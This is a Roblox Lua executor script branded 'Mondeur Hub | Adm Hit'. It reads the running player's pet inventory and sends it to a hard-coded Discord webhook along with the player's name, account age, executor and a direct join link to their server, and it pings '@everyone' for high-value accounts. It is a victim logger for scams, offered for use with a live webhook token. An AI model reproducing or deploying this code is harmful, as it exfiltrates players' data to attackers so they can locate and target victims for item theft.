--// MONDEUR HUB | ADM HIT 🦊 (ULTIMATE PERFECT - QUALITY FIRST)

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Core"):WaitForChild("ClientData"))

local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"
local request = (syn and syn.request) or (http and http.request) or http_request or request

if not request then return end

local rarityPriority = {legendary=5, ultra_rare=4, rare=3, uncommon=2, common=1}
local rarityColors = {legendary=0xFFD700, ultra_rare=0xA020F0, rare=0x1E90FF, uncommon=0x32CD32, common=0xB0B0B0}

-- =========================
-- PERFECT NAME EXTRACTION
-- =========================
local function getPerfectName(id)
    if not id then return nil end
    
    local name = tostring(id):lower():gsub("_", " ")
    
    -- UNTRADEABLE BLOCK
    local blocks = {"egg", "jerboa", "starter", "practice", "minigame"}
    for _, b in ipairs(blocks) do
        if name:find(b) then return nil end
    end
    
    -- PERFECT CLEANING - KEEP COUNTRY NAMES
    name = name:gsub("^basic%s+", "") -- Remove "basic "
    name = name:gsub("^halloween%s+", "") 
    name = name:gsub("^christmas%s+", "")
    name = name:gsub("%d", "") -- Numbers only
    name = name:gsub("^%s*(.-)%s*$", "%1") -- Trim
    
    -- FIX SPECIFIC NAMES
    name = name:gsub("kelpie", "Australian Kelpie")
    name = name:gsub("shiba", "Shiba Inu")
    name = name:gsub("spider crab", "Spider Crab")
    name = name:gsub("leopard cat", "Leopard Cat")
    
    return name:sub(1,1):upper() .. name:sub(2)
end

-- =========================
-- EMOJIS
-- =========================
local function getEmoji(name, pet)
    local n = name:lower()
    local e = ""
    if n:find("fox") then e = "🦊"
    elseif n:find("bee") then e = "🐝"
    elseif n:find("dog") or n:find("kelpie") or n:find("shiba") then e = "🐕"
    elseif n:find("cat") then e = "🐱"
    elseif n:find("crab") then e = "🦀"
    end
    
    if pet.mega then e = e .. "🌈" end
    if pet.neon then e = e .. "🟣" end
    if pet.ride then e = e .. "🏇" end
    if pet.fly then e = e .. "🪽" end
    
    return e ~= "" and e or "🐾"
end

-- =========================
-- QUALITY SORTING (RARITY > COUNT)
-- =========================
local function processPets(rawPets)
    local pets = {}
    local total = 0
    
    for _, pet in pairs(rawPets or {}) do
        if pet and pet.id then
            local cleanName = getPerfectName(pet.id)
            if not cleanName then continue end
            
            if not pets[cleanName] then
                pets[cleanName] = {
                    name = cleanName,
                    count = 0,
                    rarity = (pet.rarity or "common"):lower(),
                    neon = pet.neon or (pet.properties and pet.properties.neon),
                    mega = pet.mega or (pet.properties and pet.properties.mega),
                    ride = pet.rideable or (pet.properties and pet.properties.rideable),
                    fly = pet.flyable or (pet.properties and pet.properties.flyable)
                }
            end
            
            pets[cleanName].count = pets[cleanName].count + 1
            total = total + 10
        end
    end
    
    local list = {}
    for _, data in pairs(pets) do
        table.insert(list, data)
    end
    
    -- QUALITY FIRST: RARITY PRIORITY (Metal Ox #1!)
    table.sort(list, function(a, b)
        local aPrio = rarityPriority[a.rarity] or 1
        local bPrio = rarityPriority[b.rarity] or 1
        return aPrio > bPrio or (aPrio == bPrio and a.count > b.count)
    end)
    
    return list, total
end

-- =========================
-- CLEAN FORMAT
-- =========================
local function formatList(pets)
    local lines = {}
    for i = 1, math.min(#pets, 12) do
        local p = pets[i]
        lines[i] = getEmoji(p.name, p) .. " " .. p.name .. " x" .. p.count
    end
    return table.concat(lines, "\n")
end

-- =========================
-- SEND WEBHOOK
-- =========================
local function send()
    local success, inventory = pcall(function() return ClientData.get("inventory") end)
    local petsRaw = success and inventory and inventory.pets or {}
    
    local petList, total = processPets(petsRaw)
    
    local best = petList[1]
    local bestName = best and (best.name .. " x" .. best.count) or "None"
    local bestRarity = best and best.rarity or "common"
    
    local tier = total >= 1500 and "🔴 HIGH" or total >= 300 and "🟡 MID" or "🟢 LOW"
    local content = tier == "🔴 HIGH" and "@everyone" or ""
    local color = rarityColors[bestRarity] or 0x2F3136
    
    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```👤 "..game.Players.LocalPlayer.DisplayName..
        "\n🆔 "..game.Players.LocalPlayer.Name..
        "\n📅 "..game.Players.LocalPlayer.AccountAge.." days"..
        "\n📱 "..(identifyexecutor and identifyexecutor() or "Unknown")..
        "\n👥 "..#game.Players:GetPlayers().."/"..game.Players.MaxPlayers..
        "\n💰 "..total..
        "\n📊 "..tier.."```",
        fields = {
            {name="🏆 Best Pet", value="```"..bestName.."```"},
            {name="🐶 Pets (Quality→Qty)", value="```"..formatList(petList).."```"},
            {name="🌐 Server", value="[Join](https://www.roblox.com/games/start?placeId="..game.PlaceId.."&instanceId="..game.JobId..")"}
        },
        color = color,
        footer = {text="Mondeuronbotton"}
    }
    
    pcall(function()
        request({
            Url = WEBHOOK, Method="POST",
            Headers={["Content-Type"]="application/json"},
            Body=HttpService:JSONEncode({content=content, embeds={embed}})
        })
    end)
end

send()
